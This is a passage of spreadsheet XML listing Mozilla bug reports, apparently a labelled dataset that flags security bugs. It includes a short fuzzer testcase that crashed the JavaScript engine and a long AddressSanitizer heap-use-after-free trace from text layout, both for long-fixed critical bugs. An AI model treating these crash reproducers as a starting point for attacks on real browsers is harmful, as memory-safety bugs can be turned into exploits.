      <c r="H2713" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2713" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2713" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2713" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2713" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2713" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2713" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2713" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2713" t="inlineStr">
        <is>
          <t>[jsbugmon:update,ignore][adv-main49+]</t>
        </is>
      </c>
      <c r="Q2713" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2713" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2713" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T2713" t="n">
        <v>1</v>
      </c>
      <c r="U2713" t="n">
        <v>0</v>
      </c>
      <c r="V2713" t="n">
        <v>59</v>
      </c>
      <c r="W2713" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision ab0044bfa1df (build with --enable-debug --enable-more-deterministic, run with --fuzzing-safe --ion-offthread-compile=off --no-baseline --no-ion):
// Adapted from randomly chosen test: js/src/jit-test/tests/basic/bug1236476.js
oomTest(function() {
    offThreadCompileScript("");
});
// jsfunfuzz-generated
"".match();
Backtrace:
For detailed crash information, see attachment.</t>
        </is>
      </c>
      <c r="X2713" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2714">
      <c r="A2714" t="n">
        <v>1372639</v>
      </c>
      <c r="B2714" t="inlineStr">
        <is>
          <t>2017-06-13 10:14:51 -0700</t>
        </is>
      </c>
      <c r="C2714" t="inlineStr">
        <is>
          <t>Add stats for time spent performing redirects whilst fetching logs for parsing</t>
        </is>
      </c>
      <c r="D2714" t="inlineStr">
        <is>
          <t>2017-06-16 12:43:31 -0700</t>
        </is>
      </c>
      <c r="E2714" t="n">
        <v>1</v>
      </c>
      <c r="F2714" t="n">
        <v>1</v>
      </c>
      <c r="G2714" t="n">
        <v>7</v>
      </c>
      <c r="H2714" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2714" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J2714" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K2714" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2714" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2714" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2714" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2714" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2714" t="inlineStr"/>
      <c r="Q2714" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2714" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2714" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2714" t="n">
        <v>1</v>
      </c>
      <c r="U2714" t="n">
        <v>0</v>
      </c>
      <c r="V2714" t="n">
        <v>3</v>
      </c>
      <c r="W2714" t="inlineStr">
        <is>
          <t>It is believed that one of the (several) causes of the spikes in log parsing times is due to queue.taskcluster.net being under high load and taking a while to return the HTTP 303 redirect to the log's actual location on public-artifacts.taskcluster.net.
It would be preferable to make a data-based decision about this, however at present, New Relic only shows the overall request time (ie the combined duration of the redirect + the final HTTP 200) and does not break it down further.
The Python requests library exposes the time for each individual request, which we can add as custom New Relic annotations/events:
http://docs.python-requests.org/en/latest/api/#requests.Response.elapsed</t>
        </is>
      </c>
      <c r="X2714" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2715">
      <c r="A2715" t="n">
        <v>731835</v>
      </c>
      <c r="B2715" t="inlineStr">
        <is>
          <t>2012-02-29 15:39:29 -0800</t>
        </is>
      </c>
      <c r="C2715" t="inlineStr">
        <is>
          <t>Ignore exceptions from tegra masters that we can do nothing about</t>
        </is>
      </c>
      <c r="D2715" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2715" t="n">
        <v>1</v>
      </c>
      <c r="F2715" t="n">
        <v>1</v>
      </c>
      <c r="G2715" t="n">
        <v>5</v>
      </c>
      <c r="H2715" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2715" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2715" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2715" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2715" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2715" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2715" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2715" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2715" t="inlineStr">
        <is>
          <t>[buildmasters][reporting][cleanup]</t>
        </is>
      </c>
      <c r="Q2715" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2715" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2715" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2715" t="n">
        <v>1</v>
      </c>
      <c r="U2715" t="n">
        <v>0</v>
      </c>
      <c r="V2715" t="n">
        <v>3</v>
      </c>
      <c r="W2715" t="inlineStr">
        <is>
          <t>The bulk of the exception emails we get right now are from tegra masters complaining about one of two things:
twisted.spread.pb.DeadReferenceError: Calling Stale Broker
or
Connection was closed cleanly
AFAIK, we can do nothing about either, so we should add these exceptions to the ignore list.
Patch coming up.</t>
        </is>
      </c>
      <c r="X2715" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2716">
      <c r="A2716" t="n">
        <v>554281</v>
      </c>
      <c r="B2716" t="inlineStr">
        <is>
          <t>2010-03-23 04:02:26 -0700</t>
        </is>
      </c>
      <c r="C2716" t="inlineStr">
        <is>
          <t>open command is broken</t>
        </is>
      </c>
      <c r="D2716" t="inlineStr">
        <is>
          <t>2010-03-24 08:24:04 -0700</t>
        </is>
      </c>
      <c r="E2716" t="n">
        <v>1</v>
      </c>
      <c r="F2716" t="n">
        <v>1</v>
      </c>
      <c r="G2716" t="n">
        <v>6</v>
      </c>
      <c r="H2716" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2716" t="inlineStr">
        <is>
          <t>Skywriter Graveyard</t>
        </is>
      </c>
      <c r="J2716" t="inlineStr">
        <is>
          <t>File Explorer</t>
        </is>
      </c>
      <c r="K2716" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2716" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M2716" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N2716" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2716" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2716" t="inlineStr"/>
      <c r="Q2716" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2716" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2716" t="inlineStr">
        <is>
          <t>0.7</t>
        </is>
      </c>
      <c r="T2716" t="n">
        <v>1</v>
      </c>
      <c r="U2716" t="n">
        <v>0</v>
      </c>
      <c r="V2716" t="n">
        <v>2</v>
      </c>
      <c r="W2716" t="inlineStr">
        <is>
          <t>If you try to open a file, the file object passed into the editsession is null, 
so the command does not work at all.</t>
        </is>
      </c>
      <c r="X2716" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2717">
      <c r="A2717" t="n">
        <v>767765</v>
      </c>
      <c r="B2717" t="inlineStr">
        <is>
          <t>2012-06-23 22:35:29 -0700</t>
        </is>
      </c>
      <c r="C2717" t="inlineStr">
        <is>
          <t>Heap-use-after-free BuildTextRunsScanner::BreakSink::SetBreaks</t>
        </is>
      </c>
      <c r="D2717" t="inlineStr">
        <is>
          <t>2024-05-29 16:01:46 -0700</t>
        </is>
      </c>
      <c r="E2717" t="n">
        <v>1</v>
      </c>
      <c r="F2717" t="n">
        <v>1</v>
      </c>
      <c r="G2717" t="n">
        <v>3</v>
      </c>
      <c r="H2717" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2717" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2717" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K2717" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2717" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2717" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2717" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2717" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2717" t="inlineStr">
        <is>
          <t>[asan][fixed by bug 793233][adv-track-main17+][qa?]</t>
        </is>
      </c>
      <c r="Q2717" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2717" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2717" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T2717" t="n">
        <v>1</v>
      </c>
      <c r="U2717" t="n">
        <v>0</v>
      </c>
      <c r="V2717" t="n">
        <v>48</v>
      </c>
      <c r="W2717" t="inlineStr">
        <is>
          <t>Created attachment 636135
Testcase
Reproduces on trunk reliably when run from command line. The testcase is ugly, but seems to be dependent on text runs.
20120623201000
http://hg.mozilla.org/mozilla-central/rev/cb2904476d14
=================================================================
==29398== ERROR: AddressSanitizer heap-use-after-free on address 0x7fd3dc188480 at pc 0x7fd40e3c1930 bp 0x7fffbbf91e10 sp 0x7fffbbf91e08
READ of size 8 at 0x7fd3dc188480 thread T0
    #0 0x7fd40e3c1930 in BuildTextRunsScanner::BreakSink::SetBreaks(unsigned int, unsigned int, unsigned char*) layout/generic/nsTextFrameThebes.cpp:855
    #1 0x7fd40f6b79bc in nsLineBreaker::FlushCurrentWord() content/base/src/nsLineBreaker.cpp:123
    #2 0x7fd40f6c293a in nsLineBreaker::AppendText(nsIAtom*, unsigned char const*, unsigned int, unsigned int, nsILineBreakSink*) content/base/src/nsLineBreaker.cpp:352
    #3 0x7fd40e2f188b in BuildTextRunsScanner::SetupBreakSinksForTextRun(gfxTextRun*, void const*, unsigned int) layout/generic/nsTextFrameThebes.cpp:2216
    #4 0x7fd40e2dc353 in BuildTextRunsScanner::SetupLineBreakerContext(gfxTextRun*) layout/generic/nsTextFrameThebes.cpp:2127
    #5 0x7fd40e2d934f in BuildTextRunsScanner::FlushFrames(bool, bool) layout/generic/nsTextFrameThebes.cpp:1337
    #6 0x7fd40e2fcad8 in BuildTextRuns(gfxContext*, nsTextFrame*, nsIFrame*, nsLineList_iterator const*, nsTextFrame::TextRunType) layout/generic/nsTextFrameThebes.cpp:1285
    #7 0x7fd40e2f8754 in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, gfxContext*, nsIFrame*, nsLineList_iterator const*, unsigned int*) layout/generic/nsTextFrameThebes.cpp:2371
    #8 0x7fd40e37cd6d in nsTextFrame::ReflowText(nsLineLayout&amp;, int, nsRenderingContext*, bool, nsHTMLReflowMetrics&amp;, unsigned int&amp;) layout/generic/nsTextFrameThebes.cpp:7388
    #9 0x7fd40e1904e8 in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) layout/generic/nsLineLayout.cpp:836
    #10 0x7fd40e160ebd in nsInlineFrame::ReflowInlineFrame(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsIFrame*, unsigned int&amp;) layout/generic/nsInlineFrame.cpp:680
    #11 0x7fd40e15d5ed in nsInlineFrame::ReflowFrames(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsHTMLReflowMetrics&amp;, unsigned int&amp;) layout/generic/nsInlineFrame.cpp:543
    #12 0x7fd40e15a8fa in nsInlineFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsInlineFrame.cpp:397
    #13 0x7fd40e19016f in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) layout/generic/nsLineLayout.cpp:824
    #14 0x7fd40e160ebd in nsInlineFrame::ReflowInlineFrame(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsIFrame*, unsigned int&amp;) layout/generic/nsInlineFrame.cpp:680
    #15 0x7fd40e15d5ed in nsInlineFrame::ReflowFrames(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsHTMLReflowMetrics&amp;, unsigned int&amp;) layout/generic/nsInlineFrame.cpp:543
    #16 0x7fd40e15a8fa in nsInlineFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsInlineFrame.cpp:397
    #17 0x7fd40e19016f in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) layout/generic/nsLineLayout.cpp:824
    #18 0x7fd40de4b52f in nsBlockFrame::ReflowInlineFrame(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsIFrame*, LineReflowStatus*) layout/generic/nsBlockFrame.cpp:3834
    #19 0x7fd40de44f8a in nsBlockFrame::DoReflowInlineFrames(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) layout/generic/nsBlockFrame.cpp:3630
    #20 0x7fd40de37a07 in nsBlockFrame::ReflowInlineFrames(nsBlockReflowState&amp;, nsLineList_iterator, bool*) layout/generic/nsBlockFrame.cpp:3482
    #21 0x7fd40de263bc in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) layout/generic/nsBlockFrame.cpp:2570
    #22 0x7fd40de0b821 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) layout/generic/nsBlockFrame.cpp:2020
    #23 0x7fd40ddff2bf in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsBlockFrame.cpp:1069
    #24 0x7fd40deeed97 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) layout/generic/nsContainerFrame.cpp:906
    #25 0x7fd40e0bf237 in nsCanvasFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsCanvasFrame.cpp:429
    #26 0x7fd40deeed97 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) layout/generic/nsContainerFrame.cpp:906
    #27 0x7fd40e038b7e in nsHTMLScrollFrame::ReflowScrolledFrame(ScrollReflowState*, bool, bool, nsHTMLReflowMetrics*, bool) layout/generic/nsGfxScrollFrame.cpp:517
    #28 0x7fd40e03e42a in nsHTMLScrollFrame::ReflowContents(ScrollReflowState*, nsHTMLReflowMetrics const&amp;) layout/generic/nsGfxScrollFrame.cpp:617
    #29 0x7fd40e04274f in nsHTMLScrollFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsGfxScrollFrame.cpp:858
    #30 0x7fd40deeed97 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) layout/generic/nsContainerFrame.cpp:906
    #31 0x7fd40e416ff1 in ViewportFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsViewportFrame.cpp:200
    #32 0x7fd40db70356 in PresShell::DoReflow(nsIFrame*, bool) layout/base/nsPresShell.cpp:7382
    #33 0x7fd40db9dded in PresShell::ProcessReflowCommands(bool) layout/base/nsPresShell.cpp:7523
    #34 0x7fd40db9c4fd in PresShell::FlushPendingNotifications(mozFlushType) layout/base/nsPresShell.cpp:3852
    #35 0x7fd40dc3f45b in nsRefreshDriver::Notify(nsITimer*) layout/base/nsRefreshDriver.cpp:396
    #36 0x7fd41884a086 in nsTimerImpl::Fire() xpcom/threads/nsTimerImpl.cpp:477
    #37 0x7fd41884bbfc in nsTimerEvent::Run() xpcom/threads/nsTimerImpl.cpp:558
    #38 0x7fd41880e2b3 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:625
    #39 0x7fd41849e55d in NS_ProcessNextEvent_P(nsIThread*, bool) objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:217
    #40 0x7fd4175fbff6 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:82
    #41 0x7fd418ac088a in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:209
    #42 0x7fd418ac06d3 in MessageLoop::RunHandler() ipc/chromium/src/base/message_loop.cc:202
    #43 0x7fd418ac05b8 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:176
    #44 0x7fd416b3991e in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:165
    #45 0x7fd415783518 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:256
    #46 0x7fd40c1756d7 in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:3786
    #47 0x7fd40c17c092 in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3863
    #48 0x7fd40c17f54b in XRE_main toolkit/xre/nsAppRunner.cpp:3939
    #49 0x40a91f in do_main(int, char**) browser/app/nsBrowserApp.cpp:160
    #50 0x40834d in main browser/app/nsBrowserApp.cpp:330
    #51 0x7fd4269c1c4d in ?? ??:0
0x7fd3dc188480 is located 0 bytes inside of 160-byte region [0x7fd3dc188480,0x7fd3dc188520)
freed by thread T0 here:
    #0 0x4a2ed2 in free ??:0
    #1 0x7fd42384f5c3 in moz_free memory/mozalloc/mozalloc.cpp:49
    #2 0x7fd40e406fb3 in gfxTextRun::operator delete(void*) ../../dist/include/gfxFont.h:2335
    #3 0x7fd418e38148 in ~gfxTextRun gfx/thebes/gfxFont.cpp:4338
    #4 0x7fd40e2f778e in nsTextFrame::ClearTextRun(nsTextFrame*, nsTextFrame::TextRunType) layout/generic/nsTextFrameThebes.cpp:4242
    #5 0x7fd40e2f3717 in BuildTextRunsScanner::AssignTextRun(gfxTextRun*, float) layout/generic/nsTextFrameThebes.cpp:2343
    #6 0x7fd40e2e34b8 in BuildTextRunsScanner::BuildTextRunForFrames(void*) layout/generic/nsTextFrameThebes.cpp:2005
    #7 0x7fd40e2d96fd in BuildTextRunsScanner::FlushFrames(bool, bool) layout/generic/nsTextFrameThebes.cpp:1356
    #8 0x7fd40e2e95ba in BuildTextRunsScanner::ScanFrame(nsIFrame*) layout/generic/nsTextFrameThebes.cpp:1521
    #9 0x7fd40e2e9d99 in BuildTextRunsScanner::ScanFrame(nsIFrame*) layout/generic/nsTextFrameThebes.cpp:1559
    #10 0x7fd40e2e9d99 in BuildTextRunsScanner::ScanFrame(nsIFrame*) layout/generic/nsTextFrameThebes.cpp:1559
    #11 0x7fd40e2e9d99 in BuildTextRunsScanner::ScanFrame(nsIFrame*) layout/generic/nsTextFrameThebes.cpp:1559
    #12 0x7fd40e2e9d99 in BuildTextRunsScanner::ScanFrame(nsIFrame*) layout/generic/nsTextFrameThebes.cpp:1559
    #13 0x7fd40e2e9d99 in BuildTextRunsScanner::ScanFrame(nsIFrame*) layout/generic/nsTextFrameThebes.cpp:1559
    #14 0x7fd40e2e9d99 in BuildTextRunsScanner::ScanFrame(nsIFrame*) layout/generic/nsTextFrameThebes.cpp:1559
    #15 0x7fd40e2e9d99 in BuildTextRunsScanner::ScanFrame(nsIFrame*) layout/generic/nsTextFrameThebes.cpp:1559
    #16 0x7fd40e2e9d99 in BuildTextRunsScanner::ScanFrame(nsIFrame*) layout/generic/nsTextFrameThebes.cpp:1559
    #17 0x7fd40e2fc896 in BuildTextRuns(gfxContext*, nsTextFrame*, nsIFrame*, nsLineList_iterator const*, nsTextFrame::TextRunType) layout/generic/nsTextFrameThebes.cpp:1260
    #18 0x7fd40e2f8754 in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, gfxContext*, nsIFrame*, nsLineList_iterator const*, unsigned int*) layout/generic/nsTextFrameThebes.cpp:2371
    #19 0x7fd40e37cd6d in nsTextFrame::ReflowText(nsLineLayout&amp;, int, nsRenderingContext*, bool, nsHTMLReflowMetrics&amp;, unsigned int&amp;) layout/generic/nsTextFrameThebes.cpp:7388
    #20 0x7fd40e1904e8 in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) layout/generic/nsLineLayout.cpp:836
    #21 0x7fd40e160ebd in nsInlineFrame::ReflowInlineFrame(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsIFrame*, unsigned int&amp;) layout/generic/nsInlineFrame.cpp:680
    #22 0x7fd40e15d5ed in nsInlineFrame::ReflowFrames(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsHTMLReflowMetrics&amp;, unsigned int&amp;) layout/generic/nsInlineFrame.cpp:543
    #23 0x7fd40e15a8fa in nsInlineFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsInlineFrame.cpp:397
    #24 0x7fd40e19016f in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) layout/generic/nsLineLayout.cpp:824
    #25 0x7fd40e160ebd in nsInlineFrame::ReflowInlineFrame(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsIFrame*, unsigned int&amp;) layout/generic/nsInlineFrame.cpp:680
    #26 0x7fd40e15d5ed in nsInlineFrame::ReflowFrames(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsHTMLReflowMetrics&amp;, unsigned int&amp;) layout/generic/nsInlineFrame.cpp:543
    #27 0x7fd40e15a8fa in nsInlineFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsInlineFrame.cpp:397
    #28 0x7fd40e19016f in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) layout/generic/nsLineLayout.cpp:824
    #29 0x7fd40de4b52f in nsBlockFrame::ReflowInlineFrame(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsIFrame*, LineReflowStatus*) layout/generic/nsBlockFrame.cpp:3834
previously allocated by thread T0 here:
    #0 0x4a2f92 in malloc ??:0
    #1 0x7fd42384fa23 in moz_malloc memory/mozalloc/mozalloc.cpp:64
    #2 0x7fd418e36a66 in gfxTextRun::AllocateStorageForTextRun(unsigned long, unsigned int) gfx/thebes/gfxFont.cpp:4277
    #3 0x7fd418e19dbf in gfxTextRun::Create(gfxTextRunFactory::Parameters const*, unsigned int, gfxFontGroup*, unsigned int) gfx/thebes/gfxFont.cpp:4294
    #4 0x7fd418e1d585 in gfxFontGroup::MakeTextRun(unsigned char const*, unsigned int, gfxTextRunFactory::Parameters const*, unsigned int) gfx/thebes/gfxFont.cpp:3367
    #5 0x7fd40e2efc31 in gfxTextRun* MakeTextRun&lt;unsigned char&gt;(unsigned char const*, unsigned int, gfxFontGroup*, gfxTextRunFactory::Parameters const*, unsigned int) layout/generic/nsTextFrameThebes.cpp:517
    #6 0x7fd40e2e2ea5 in BuildTextRunsScanner::BuildTextRunForFrames(void*) layout/generic/nsTextFrameThebes.cpp:1965
    #7 0x7fd40e2d96fd in BuildTextRunsScanner::FlushFrames(bool, bool) layout/generic/nsTextFrameThebes.cpp:1356
    #8 0x7fd40e2e95ba in BuildTextRunsScanner::ScanFrame(nsIFrame*) layout/generic/nsTextFrameThebes.cpp:1521
    #9 0x7fd40e2e9d99 in BuildTextRunsScanner::ScanFrame(nsIFrame*) layout/generic/nsTextFrameThebes.cpp:1559
    #10 0x7fd40e2e9d99 in BuildTextRunsScanner::ScanFrame(nsIFrame*) layout/generic/nsTextFrameThebes.cpp:1559
    #11 0x7fd40e2e9d99 in BuildTextRunsScanner::ScanFrame(nsIFrame*) layout/generic/nsTextFrameThebes.cpp:1559
    #12 0x7fd40e2e9d99 in BuildTextRunsScanner::ScanFrame(nsIFrame*) layout/generic/nsTextFrameThebes.cpp:1559
    #13 0x7fd40e2e9d99 in BuildTextRunsScanner::ScanFrame(nsIFrame*) layout/generic/nsTextFrameThebes.cpp:1559
    #14 0x7fd40e2e9d99 in BuildTextRunsScanner::ScanFrame(nsIFrame*) layout/generic/nsTextFrameThebes.cpp:1559
    #15 0x7fd40e2e9d99 in BuildTextRunsScanner::ScanFrame(nsIFrame*) layout/generic/nsTextFrameThebes.cpp:1559
    #16 0x7fd40e2e9d99 in BuildTextRunsScanner::ScanFrame(nsIFrame*) layout/generic/nsTextFrameThebes.cpp:1559
    #17 0x7fd40e2fc896 in BuildTextRuns(gfxContext*, nsTextFrame*, nsIFrame*, nsLineList_iterator const*, nsTextFrame::TextRunType) layout/generic/nsTextFrameThebes.cpp:1260
    #18 0x7fd40e2f8754 in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, gfxContext*, nsIFrame*, nsLineList_iterator const*, unsigned int*) layout/generic/nsTextFrameThebes.cpp:2371
    #19 0x7fd40e37cd6d in nsTextFrame::ReflowText(nsLineLayout&amp;, int, nsRenderingContext*, bool, nsHTMLReflowMetrics&amp;, unsigned int&amp;) layout/generic/nsTextFrameThebes.cpp:7388
    #20 0x7fd40e1904e8 in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) layout/generic/nsLineLayout.cpp:836
    #21 0x7fd40e160ebd in nsInlineFrame::ReflowInlineFrame(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsIFrame*, unsigned int&amp;) layout/generic/nsInlineFrame.cpp:680
    #22 0x7fd40e15d5ed in nsInlineFrame::ReflowFrames(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsHTMLReflowMetrics&amp;, unsigned int&amp;) layout/generic/nsInlineFrame.cpp:543
==29398== ABORTING
Stats: 158M malloced (192M for red zones) by 474222 calls
Stats: 42M realloced by 20531 calls
Stats: 114M freed by 238653 calls
Stats: 0M really freed by 0 calls
Stats: 380M (97330 full pages) mmaped in 95 calls
  mmaps   by size class: 8:393192; 9:57337; 10:20475; 11:18423; 12:3072; 13:2048; 14:1536; 15:384; 16:576; 17:128; 18:176; 19:48; 20:16;
  mallocs by size class: 8:383056; 9:48867; 10:17897; 11:17190; 12:2587; 13:1929; 14:1466; 15:348; 16:547; 17:118; 18:163; 19:41; 20:13;
  frees   by size class: 8:167524; 9:37955; 10:14368; 11:13945; 12:1647; 13:991; 14:1252; 15:291; 16:471; 17:103; 18:58; 19:38; 20:10;
  rfrees  by size class:
Stats: malloc large: 335 small slow: 2133
Shadow byte and word:
  0x1ffa7b831090: fd
  0x1ffa7b831090: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1ffa7b831070: fa fa fa fa fa fa fa fa
  0x1ffa7b831078: fa fa fa fa fa fa fa fa
  0x1ffa7b831080: fa fa fa fa fa fa fa fa
  0x1ffa7b831088: fa fa fa fa fa fa fa fa
=&gt;0x1ffa7b831090: fd fd fd fd fd fd fd fd
  0x1ffa7b831098: fd fd fd fd fd fd fd fd
  0x1ffa7b8310a0: fd fd fd fd fd fd fd fd
  0x1ffa7b8310a8: fd fd fd fd fd fd fd fd
  0x1ffa7b8310b0: fa fa fa fa fa fa fa fa</t>
        </is>
      </c>
      <c r="X2717" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2718">
      <c r="A2718" t="n">
        <v>1764343</v>
      </c>
      <c r="B2718" t="inlineStr">
        <is>
          <t>2022-04-12 07:42:44 -0700</t>
        </is>
      </c>
      <c r="C2718" t="inlineStr">
        <is>
